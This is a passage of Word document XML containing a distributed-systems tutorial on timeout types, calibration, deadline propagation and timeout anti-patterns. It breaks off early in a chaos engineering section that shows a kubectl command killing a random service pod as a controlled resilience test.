    <w:p w14:paraId="715F9F65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Too short: legitimate connections fail during network congestion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72E1D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Too long: dead hosts waste threads for minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F1AEC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC8A887" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   SYN packet: TCP connection starts with SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5FFE2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Connection timeout: how long to wait for SYN-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27666DD3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9000B6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>2. Read timeout (response timeout):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277FD69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   How long to wait for data after connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041A74D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BBD5B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   The "operational timeout" — most commonly discussed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02B5C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59049BE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Calibration: based on p99.9 of observed response latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD3254" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Measure: p99 = 200ms, p99.9 = 800ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E07257" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Set timeout: 1000ms (above p99.9, below p99.99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F6BCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22270BB6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Too short: legitimate slow responses become errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF90B1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Too long: slow downstream occupies thread too long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432BB0F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E301F35" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Different per endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A38A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Fast endpoint: GET /health → 100ms timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC3702" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Slow endpoint: POST /export → 300 second timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67277C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22629F22" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Total/deadline timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7FA216" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Maximum total time for entire operation (including retries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779EB74" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A833A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Context deadline (Go/gRPC): request has an absolute deadline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249929DB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Propagated across service boundaries: "this request must complete by T"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E76BAF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AEA19" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Prevents: retries extending operation indefinitely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A938C89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69833A3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E0129" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     User request: 30 second timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F7B48" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Service A: receives request, creates context with 30s deadline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71093685" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Service A calls B: context has 28s remaining (after 2s processing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D8375" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     B calls C: context has 25s remaining (after 3s in B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28CBCA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     C: only 25s to respond — knows it must return within budget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EC545" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682CD71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Without deadline propagation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13105F0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">       Each service has its own timeout (say 30s each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AC730" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">       A retries B 3 times with backoff: 3 × 30s = 90s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58845B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">       User's request: already timed out at 30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA8414" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">       B and C: still processing for 90s wasted work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C09D831" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="00B7C36B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Timeout anti-patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D09DC4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="72411D07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. No timeout (infinite wait):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47037D0E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   NEVER in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE16CB5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Symptom: "the service just hangs" on failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421447CD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F135A9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>2. Same timeout for all operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44881C64" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Different operations have different latency profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5FCA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   One-size-fits-all: either too short (false errors) or too long (slow recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A946DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1063BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Timeout longer than user's patience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CEAF6F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   User HTTP request: 30 second browser timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D1F7F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Service A timeout: 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E33BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   User gives up at 30s; service continues processing for 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B3A305" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Wasted work; no benefit to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81A3A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116EFC6E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>4. Timeout without cancellation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6D07D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Timeout fires → caller gives up → downstream keeps working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71094504" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   CPU, DB connections, locks all consumed for work no one cares about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9A317" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E26DEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Proper cancellation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F8B90" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Go: context.WithTimeout → context.Done() channel signals cancellation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA002F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     Java: CompletableFuture.cancel() → upstream notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5E1FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     gRPC: context deadline → server checks ctx.Done() and stops early</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB9BB9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1E8DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>5. Not logging timeout values on timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F4C43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Timeout error occurs, no log showing what the timeout was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D8859" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   "Why did it timeout? What was the limit?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63848849" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Always log: what operation, what timeout, what elapsed time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D3D12" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="2A38DD50">
          <v:rect id="_x0000_i6445" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCCD299" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Chaos Engineering — Proactive Fault Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB8298D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fault Injection — Testing Before Failures Find You</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771EC456" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F0755" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>Chaos engineering principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A93DE4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  "The best way to avoid system outages is to fail constantly"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B830F6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B451A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Reasoning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6DA79" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    If failure never happens in test: teams are unprepared for production failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88409B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Failure handling code: rarely tested → likely buggy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25233C79" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Recovery procedures: not practiced → slow and error-prone under pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D3B058" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20F742" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Chaos: deliberately inject failures → verify system handles them correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA9045" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          while load is low and team is paying attention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D731F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A762DC0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Better: discover failure modes in controlled chaos experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5EF27" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Than: discover them during a real incident at 3am</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E745AD2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD1835" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos injection types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37269500" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="5E2F027B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. Process failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F0E96" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Kill random service instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F6B88" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD0E7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   kubectl delete pod $(kubectl get pods -l app=payment-service -o name | shuf -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1168DC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF0BA80" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Expected: load balancer routes around killed pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2FC6FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">             pod restarted by Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F20046" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">             no requests lost (in-flight requests may fail, circuit breaker catches)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40015CE3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Verify: error rate spike &lt; 1% for &lt; 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F555A0B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C08D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t>2. Network failures:</w:t>
      </w:r>
    </w:p>
